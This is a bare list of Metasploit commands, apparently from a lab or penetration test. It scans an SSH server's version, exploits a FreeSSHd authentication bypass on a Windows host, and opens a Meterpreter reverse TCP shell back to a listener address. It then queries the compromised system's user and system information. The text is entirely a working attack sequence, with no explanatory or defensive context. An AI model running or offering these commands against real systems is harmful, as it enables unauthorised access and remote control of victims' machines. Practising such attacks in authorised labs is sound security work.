use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168.178.22 run use exploit/windows/ssh/freesshd_authbypass set RHOST 192.168.178.22 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo